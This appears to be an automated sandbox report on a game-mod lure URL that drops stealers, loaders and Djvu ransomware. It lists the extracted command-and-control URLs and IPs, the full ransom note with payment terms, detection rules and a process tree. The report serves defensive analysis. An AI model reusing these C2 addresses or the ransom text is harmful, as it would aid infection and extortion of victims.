djvu | hxxps://duikosgreec[.]pro/?param=league+of+legends+first+person+mod

Analysis

max time kernel
72s
max time network
224s
platform
windows11-21h2_x64
resource
win11-20240214-en
resource tags

arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system
submitted
21/02/2024, 11:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://duikosgreec.pro/?param=league+of+legends+first+person+mod

Malware Config

Extracted

Family

stealc

http://185.172.128.24

Attributes

url_path
/f993692117a3fda2.php

Extracted

Family

djvu

http://habrafa.com/test2/get.php

Attributes

extension
.lkfr
offline_id
OxV6DGl22io8sqMOW1zCCOlzPiv4f1Vqzw7Y8zt1
payload_url
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://we.tl/t-uNdL2KHHdy Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0852ASdw

rsa_pubkey.plain

Extracted

Family

smokeloader

Version

2022

http://selebration17io.io/index.php

http://vacantion18ffeu.cc/index.php

http://valarioulinity1.net/index.php

http://buriatiarutuhuob.net/index.php

http://cassiosssionunu.me/index.php

http://sulugilioiu19.net/index.php

http://goodfooggooftool.net/index.php

rc4.i32

Extracted

Family

risepro

193.233.132.67:50500

193.233.132.49:50500

193.233.132.62:50500

Extracted

Family

smokeloader

Botnet

pub3

Signatures

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral1/files/0x000100000002a8b0-900.dat	family_zgrat_v1
behavioral1/files/0x000100000002a8b0-1278.dat	family_zgrat_v1
behavioral1/files/0x000100000002a8b0-1279.dat	family_zgrat_v1
behavioral1/memory/2312-1292-0x0000000000340000-0x000000000098A000-memory.dmp	family_zgrat_v1

Detected Djvu ransomware 5 IoCs

resource	yara_rule
behavioral1/memory/5176-1295-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/5176-1300-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4740-1311-0x0000000002360000-0x000000000247B000-memory.dmp	family_djvu
behavioral1/memory/5176-1310-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/5176-1318-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

resource	yara_rule
behavioral1/memory/5584-1462-0x0000000005280000-0x0000000005B6B000-memory.dmp	family_glupteba
behavioral1/memory/5584-1480-0x0000000000400000-0x0000000003117000-memory.dmp	family_glupteba

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000100000002aa47-2504.dat	family_redline
behavioral1/files/0x000300000002ab26-4714.dat	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	nt5BJHeRuAL4rxCDKsRgvs1Z.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
7232	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	nt5BJHeRuAL4rxCDKsRgvs1Z.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	nt5BJHeRuAL4rxCDKsRgvs1Z.exe

Executes dropped EXE 12 IoCs

pid	Process
1604	setup.exe
4536	setup.exe
5540	5hxqpp4yZ9PzDLBQDKZWY5pP.exe
5560	acxRhwdrPnMMTMfVizASiPHK.exe
5548	IcOQ9mob9EmjLq5Y8jl5i8Ks.exe
5576	nt5BJHeRuAL4rxCDKsRgvs1Z.exe
5584	WerFault.exe
5600	Sd1A4rqmgdATOCjrYftYlVk8.exe
5612	8Gi6lciEWsBYkwpuiH33GJM_.exe
5624	p_5eoyj7AozH9HSIoz3zaQb7.exe
6080	p_5eoyj7AozH9HSIoz3zaQb7.tmp
3580	powershell.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1002246581-1510179080-2205450789-1000\Software\Wine	nt5BJHeRuAL4rxCDKsRgvs1Z.exe

Loads dropped DLL 3 IoCs

pid	Process
6080	p_5eoyj7AozH9HSIoz3zaQb7.tmp
6080	p_5eoyj7AozH9HSIoz3zaQb7.tmp
6080	p_5eoyj7AozH9HSIoz3zaQb7.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	91.211.247.248

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
123	iplogger.org
36	iplogger.org
63	iplogger.org
105	iplogger.org

Looks up external IP address via web service 17 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
65	ipinfo.io
26	ipinfo.io
36	api.myip.com
120	ipinfo.io
205	ipinfo.io
226	ipinfo.io
10	ipinfo.io
24	api.myip.com
111	ipinfo.io
172	ipinfo.io
209	ipinfo.io
210	ipinfo.io
4	api.myip.com
67	ipinfo.io
109	api.myip.com
110	ipinfo.io
119	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000100000002a960-1754.dat	autoit_exe
behavioral1/files/0x000800000002a961-2428.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
1604	setup.exe
4536	setup.exe
5576	nt5BJHeRuAL4rxCDKsRgvs1Z.exe

Launches sc.exe 12 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5352	sc.exe
8844	sc.exe
1268	sc.exe
7916	sc.exe
2212	sc.exe
4532	sc.exe
8884	sc.exe
3584	sc.exe
8068	sc.exe
3208	sc.exe
4536	sc.exe
7736	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000100000002aaf6-4570.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 24 IoCs

pid	pid_target	Process	procid_target
3464	5612	WerFault.exe	108
3344	5600	WerFault.exe	109
5480	5612	WerFault.exe	108
5844	5176	WerFault.exe	137
3516	5760	WerFault.exe	150
4796	5696	WerFault.exe	147
1916	5612	WerFault.exe	108
2752	4356	WerFault.exe	153
5232	5612	WerFault.exe	108
2476	5612	WerFault.exe	108
4024	5612	WerFault.exe	108
4400	5612	WerFault.exe	108
4796	5612	WerFault.exe	108
5296	5612	WerFault.exe	108
6152	5560	WerFault.exe	112
8412	5520	WerFault.exe	337
5264	8792	WerFault.exe	333
9204	7376	WerFault.exe	361
2532	7372	WerFault.exe	353
3972	7372	WerFault.exe	353
5772	7372	WerFault.exe	353
8960	5392	WerFault.exe	345
8824	8452	WerFault.exe	359
6816	6292	WerFault.exe	512

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5hxqpp4yZ9PzDLBQDKZWY5pP.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5hxqpp4yZ9PzDLBQDKZWY5pP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	5hxqpp4yZ9PzDLBQDKZWY5pP.exe

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4304	schtasks.exe
5512	schtasks.exe
5976	schtasks.exe
6024	schtasks.exe
6380	schtasks.exe
1888	schtasks.exe
1296	schtasks.exe
4664	schtasks.exe
5660	schtasks.exe
5200	schtasks.exe
4024	schtasks.exe
5076	schtasks.exe
8864	schtasks.exe
8268	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
6424	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2732	taskkill.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-1002246581-1510179080-2205450789-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	7zFM.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\file_release_v3.rar:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
2460	msedge.exe
2460	msedge.exe
4160	msedge.exe
4160	msedge.exe
880	identity_helper.exe
880	identity_helper.exe
2940	DllHost.exe
2940	DllHost.exe
2468	msedge.exe
2468	msedge.exe
1604	setup.exe
1604	setup.exe
5540	5hxqpp4yZ9PzDLBQDKZWY5pP.exe
5540	5hxqpp4yZ9PzDLBQDKZWY5pP.exe
5576	nt5BJHeRuAL4rxCDKsRgvs1Z.exe
5576	nt5BJHeRuAL4rxCDKsRgvs1Z.exe
6080	p_5eoyj7AozH9HSIoz3zaQb7.tmp
6080	p_5eoyj7AozH9HSIoz3zaQb7.tmp

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3716	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeRestorePrivilege	3716	7zFM.exe
Token: 35	3716	7zFM.exe
Token: SeSecurityPrivilege	3716	7zFM.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
3716	7zFM.exe
3716	7zFM.exe
6080	p_5eoyj7AozH9HSIoz3zaQb7.tmp

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe
4160	msedge.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
1604	setup.exe
4536	setup.exe
5624	p_5eoyj7AozH9HSIoz3zaQb7.exe
5560	acxRhwdrPnMMTMfVizASiPHK.exe
5540	5hxqpp4yZ9PzDLBQDKZWY5pP.exe
5548	IcOQ9mob9EmjLq5Y8jl5i8Ks.exe
5600	Sd1A4rqmgdATOCjrYftYlVk8.exe
5584	WerFault.exe
5612	8Gi6lciEWsBYkwpuiH33GJM_.exe
6080	p_5eoyj7AozH9HSIoz3zaQb7.tmp
3580	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4160 wrote to memory of 4500	4160	msedge.exe	16
PID 4160 wrote to memory of 4500	4160	msedge.exe	16
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 1152	4160	msedge.exe	29
PID 4160 wrote to memory of 2460	4160	msedge.exe	28
PID 4160 wrote to memory of 2460	4160	msedge.exe	28
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27
PID 4160 wrote to memory of 2812	4160	msedge.exe	27

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://duikosgreec.pro/?param=league+of+legends+first+person+mod
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
  2⤵
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
  2⤵
  PID:2812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2
  2⤵
  PID:1152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:3304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:2572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
  2⤵
  PID:1460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5972 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
  2⤵
  PID:4736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:8
  2⤵
  PID:2940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,13060059113368286890,3232884461719338517,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
  2⤵
  PID:3864

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2156

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2476

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2940

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1844

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\file_release_v3.rar"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3716

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1604
- C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe
  "C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5624
- - C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-TKD00.tmp\p_5eoyj7AozH9HSIoz3zaQb7.tmp" /SL5="$B00D6,4268356,54272,C:\Users\Admin\Documents\GuardFox\p_5eoyj7AozH9HSIoz3zaQb7.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:6080
  - - C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe
      "C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe" -i
      4⤵
      PID:3580
  - - C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe
      "C:\Users\Admin\AppData\Local\CDRWIN Media\cdrwinmedia.exe" -s
      4⤵
      PID:5812
- C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe
  "C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5612
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 772
    3⤵
    - Program crash
    PID:3464
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 772
    3⤵
    - Program crash
    PID:5480
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 800
    3⤵
    - Program crash
    PID:1916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 784
    3⤵
    - Program crash
    PID:5232
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1040
    3⤵
    - Program crash
    PID:2476
